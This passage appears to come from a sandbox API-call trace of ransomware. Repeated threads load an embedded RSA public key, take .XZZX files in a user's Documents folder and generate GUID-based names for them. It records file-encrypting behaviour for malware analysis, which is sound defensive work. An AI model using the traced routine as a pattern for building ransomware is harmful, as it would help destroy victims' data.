KEY-----" [0228.897] lstrcpyW (in: lpString1=0x2daf460, lpString2="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" | out: lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" [0228.897] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0228.897] SetErrorMode (uMode=0x1) returned 0x1 [0228.897] lstrcpyW (in: lpString1=0x2daf860, lpString2="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" | out: lpString1="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" [0228.897] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x3b8da8fc, Data2=0xe430, Data3=0x4fee, Data4=([0]=0xa7, [1]=0x90, [2]=0xbc, [3]=0x43, [4]=0x21, [5]=0x31, [6]=0x96, [7]=0x8c))) returned 0x0 [0228.897] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned 81 [0228.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0228.897] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\55101F40473EF4A03B8DA8FC4A19D8E8.XZZX") returned 81 [0228.897] StrStrW (lpFirst="2F2EBAD63A6E51CF01E49D9E3E863617.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 876 os_tid = 0x10b4 [0229.045] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.045] lstrcpyW (in: lpString1=0x2daf460, lpString2="2FFB243E16646FF464F688111A91543C.XZZX" | out: lpString1="2FFB243E16646FF464F688111A91543C.XZZX") returned="2FFB243E16646FF464F688111A91543C.XZZX" [0229.046] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.046] SetErrorMode (uMode=0x1) returned 0x1 [0229.046] lstrcpyW (in: lpString1=0x2daf860, lpString2="2FFB243E16646FF464F688111A91543C.XZZX" | out: lpString1="2FFB243E16646FF464F688111A91543C.XZZX") returned="2FFB243E16646FF464F688111A91543C.XZZX" [0229.046] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xe95cc873, Data2=0x2e4d, Data3=0x42bd, Data4=([0]=0x87, [1]=0x7c, [2]=0x97, [3]=0xb9, [4]=0x6c, [5]=0xd0, [6]=0x40, [7]=0x80))) returned 0x0 [0229.046] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2FFB243E16646FF464F688111A91543C.XZZX") returned 81 [0229.046] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0229.046] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\DCECF4970C1208D9E95CC8730EECED21.XZZX") returned 81 [0229.046] StrStrW (lpFirst="2FFB243E16646FF464F688111A91543C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 877 os_tid = 0x10b8 [0229.202] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.203] lstrcpyW (in: lpString1=0x2daf460, lpString2="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" | out: lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" [0229.203] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.203] SetErrorMode (uMode=0x1) returned 0x1 [0229.203] lstrcpyW (in: lpString1=0x2daf860, lpString2="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" | out: lpString1="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX" [0229.203] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xeb351691, Data2=0x87cb, Data3=0x4920, Data4=([0]=0xa1, [1]=0x30, [2]=0xaf, [3]=0x7c, [4]=0xc7, [5]=0x8, [6]=0xb7, [7]=0xca))) returned 0x0 [0229.203] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\38AA9E1F3FE71932FADE96E143FEFD7A.XZZX") returned 81 [0229.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0229.203] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\81FF5BFB26C9DC60EB35169129A4C0A8.XZZX") returned 81 [0229.203] StrStrW (lpFirst="38AA9E1F3FE71932FADE96E143FEFD7A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 878 os_tid = 0x10bc [0229.357] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.357] lstrcpyW (in: lpString1=0x2daf460, lpString2="4CA2A3B835A9C9D86061764339F6AE20.XZZX" | out: lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned="4CA2A3B835A9C9D86061764339F6AE20.XZZX" [0229.357] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.357] SetErrorMode (uMode=0x1) returned 0x1 [0229.358] lstrcpyW (in: lpString1=0x2daf860, lpString2="4CA2A3B835A9C9D86061764339F6AE20.XZZX" | out: lpString1="4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned="4CA2A3B835A9C9D86061764339F6AE20.XZZX" [0229.358] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xab37336f, Data2=0x4d8b, Data3=0x47cd, Data4=([0]=0xb2, [1]=0x6e, [2]=0xb2, [3]=0x57, [4]=0x63, [5]=0xfa, [6]=0xde, [7]=0x78))) returned 0x0 [0229.358] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CA2A3B835A9C9D86061764339F6AE20.XZZX") returned 81 [0229.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0229.358] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9171504515BFA54FAB37336F189A8997.XZZX") returned 81 [0229.358] StrStrW (lpFirst="4CA2A3B835A9C9D86061764339F6AE20.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 879 os_tid = 0x10c0 [0229.514] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.514] lstrcpyW (in: lpString1=0x2daf460, lpString2="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" | out: lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" [0229.514] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.514] SetErrorMode (uMode=0x1) returned 0x1 [0229.514] lstrcpyW (in: lpString1=0x2daf860, lpString2="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" | out: lpString1="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX" [0229.514] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xfc4286fe, Data2=0x8091, Data3=0x4284, Data4=([0]=0xb2, [1]=0xb9, [2]=0xf9, [3]=0x2d, [4]=0x51, [5]=0xf5, [6]=0x6c, [7]=0xe0))) returned 0x0 [0229.514] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX") returned 81 [0229.514] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0229.514] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\252D75DE2167ACC4FC4286FE2442910C.XZZX") returned 81 [0229.514] StrStrW (lpFirst="5A5E8816436ABA61C7EC8F1A47A79EA9.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 880 os_tid = 0x10c4 [0229.669] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.669] lstrcpyW (in: lpString1=0x2daf460, lpString2="5F3F59042CD153CCC290441930FE3814.XZZX" | out: lpString1="5F3F59042CD153CCC290441930FE3814.XZZX") returned="5F3F59042CD153CCC290441930FE3814.XZZX" [0229.669] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.669] SetErrorMode (uMode=0x1) returned 0x1 [0229.669] lstrcpyW (in: lpString1=0x2daf860, lpString2="5F3F59042CD153CCC290441930FE3814.XZZX" | out: lpString1="5F3F59042CD153CCC290441930FE3814.XZZX") returned="5F3F59042CD153CCC290441930FE3814.XZZX" [0229.669] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xfd251352, Data2=0x82ca, Data3=0x45a4, Data4=([0]=0x80, [1]=0x47, [2]=0x37, [3]=0x15, [4]=0xae, [5]=0xdc, [6]=0x81, [7]=0x78))) returned 0x0 [0229.669] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5F3F59042CD153CCC290441930FE3814.XZZX") returned 81 [0229.669] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0229.669] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9310E2B423943B68FD251352266F1FB0.XZZX") returned 81 [0229.670] StrStrW (lpFirst="5F3F59042CD153CCC290441930FE3814.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 881 os_tid = 0x10c8 [0229.825] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.825] lstrcpyW (in: lpString1=0x2daf460, lpString2="7E0556C23257A27A640F901F368486C2.XZZX" | out: lpString1="7E0556C23257A27A640F901F368486C2.XZZX") returned="7E0556C23257A27A640F901F368486C2.XZZX" [0229.825] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.825] SetErrorMode (uMode=0x1) returned 0x1 [0229.825] lstrcpyW (in: lpString1=0x2daf860, lpString2="7E0556C23257A27A640F901F368486C2.XZZX" | out: lpString1="7E0556C23257A27A640F901F368486C2.XZZX") returned="7E0556C23257A27A640F901F368486C2.XZZX" [0229.825] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xf78a748, Data2=0x9136, Data3=0x4408, Data4=([0]=0xa3, [1]=0x28, [2]=0x83, [3]=0xa2, [4]=0x1b, [5]=0x4, [6]=0x1c, [7]=0xb8))) returned 0x0 [0229.825] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7E0556C23257A27A640F901F368486C2.XZZX") returned 81 [0229.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0229.826] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\9A3311302696E1B00F78A7482971C5F8.XZZX") returned 81 [0229.826] StrStrW (lpFirst="7E0556C23257A27A640F901F368486C2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 882 os_tid = 0x10cc [0229.982] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0229.982] lstrcpyW (in: lpString1=0x2daf460, lpString2="96E8BC382A82756A96F374BC2E7B59B2.XZZX" | out: lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned="96E8BC382A82756A96F374BC2E7B59B2.XZZX" [0229.982] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0229.982] SetErrorMode (uMode=0x1) returned 0x1 [0229.982] lstrcpyW (in: lpString1=0x2daf860, lpString2="96E8BC382A82756A96F374BC2E7B59B2.XZZX" | out: lpString1="96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned="96E8BC382A82756A96F374BC2E7B59B2.XZZX" [0229.982] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x443aeed2, Data2=0x4550, Data3=0x4030, Data4=([0]=0xaf, [1]=0x56, [2]=0x63, [3]=0xa2, [4]=0x83, [5]=0x62, [6]=0xe5, [7]=0xbe))) returned 0x0 [0229.982] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\96E8BC382A82756A96F374BC2E7B59B2.XZZX") returned 81 [0229.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0229.982] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\34C93BA01160FF00443AEED2143BE348.XZZX") returned 81 [0229.982] StrStrW (lpFirst="96E8BC382A82756A96F374BC2E7B59B2.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 883 os_tid = 0x10d0 [0230.138] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0230.138] lstrcpyW (in: lpString1=0x2daf460, lpString2="A9467A821967F20598E66B961D60D64D.XZZX" | out: lpString1="A9467A821967F20598E66B961D60D64D.XZZX") returned="A9467A821967F20598E66B961D60D64D.XZZX" [0230.138] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0230.138] SetErrorMode (uMode=0x1) returned 0x1 [0230.138] lstrcpyW (in: lpString1=0x2daf860, lpString2="A9467A821967F20598E66B961D60D64D.XZZX" | out: lpString1="A9467A821967F20598E66B961D60D64D.XZZX") returned="A9467A821967F20598E66B961D60D64D.XZZX" [0230.138] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x795c8718, Data2=0x28db, Data3=0x4d04, Data4=([0]=0xa2, [1]=0xc7, [2]=0xad, [3]=0xa8, [4]=0x87, [5]=0x25, [6]=0x15, [7]=0x5e))) returned 